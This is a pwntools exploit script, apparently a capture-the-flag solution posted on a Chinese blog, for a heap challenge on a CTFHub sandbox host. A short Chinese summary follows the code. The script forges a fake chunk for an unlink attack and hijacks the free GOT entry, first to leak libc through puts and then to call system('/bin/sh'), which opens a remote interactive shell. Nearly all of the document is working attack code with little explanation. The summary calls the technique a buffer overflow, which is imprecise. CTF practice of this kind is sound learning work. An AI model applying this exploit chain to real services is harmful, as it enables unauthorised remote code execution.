from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("challenge-c1de9e72dce05941.sandbox.ctfhub.com",26940)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")
def add(size):
io.recvuntil(b"Choice:")
io.sendline(b"1")
io.recvuntil(b"Size: ")
io.sendline(str(size))
def edit(idx,data):
io.recvuntil(b"Choice:")
io.sendline(b"2")
io.recvuntil(b"Index: ")
io.sendline(str(idx))
io.recvuntil(b"Content: ")
io.sendline(data)
def free(idx):
io.recvuntil(b"Choice:")
io.sendline(b"3")
io.recvuntil(b"Index: ")
io.sendline(str(idx))
fake_chunk = 0x602140
fake_fd = fake_chunk-0x18
fake_bk = fake_chunk-0x10
add(0x88)
add(0x4f8)
add(0x80)
payload = p64(0)+p64(0x81)+p64(fake_fd)+p64(fake_bk)+b"a"*(0x80-4*8)
payload += p64(0x80)
edit(0,payload)
free(1)
puts_plt = b"\xB0\x06\x40\x00\x00"
puts_got = elf.got['puts']
free_got = elf.got['free']
edit(0,p64(0)*3+p64(free_got)+p64(puts_got))
edit(0,puts_plt)
edit(2,p64(puts_got))
free(1)
puts_addr = u64(io.recv(6).ljust(8,b"\x00"))
libc_addr = puts_addr-libc.sym['puts']
system_addr = libc_addr+libc.sym['system']
print("puts_addr----------->: ",hex(puts_addr))
print("libc_addr----------->: ",hex(libc_addr))
print(p64(system_addr)[0:7])
edit(0,p64(system_addr)[0:7])
edit(2,b"/bin/sh\x00")
free(2)
io.interactive()
该代码展示了如何利用Python的pwn库来针对一个具有特定漏洞的远程服务执行一个缓冲区溢出攻击。首先,它通过添加、编辑和释放内存块来构造一个漏洞利用链,然后篡改puts函数的GOT表项以控制程序流,最终获取system地址并执行/bin/sh来获得shell。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
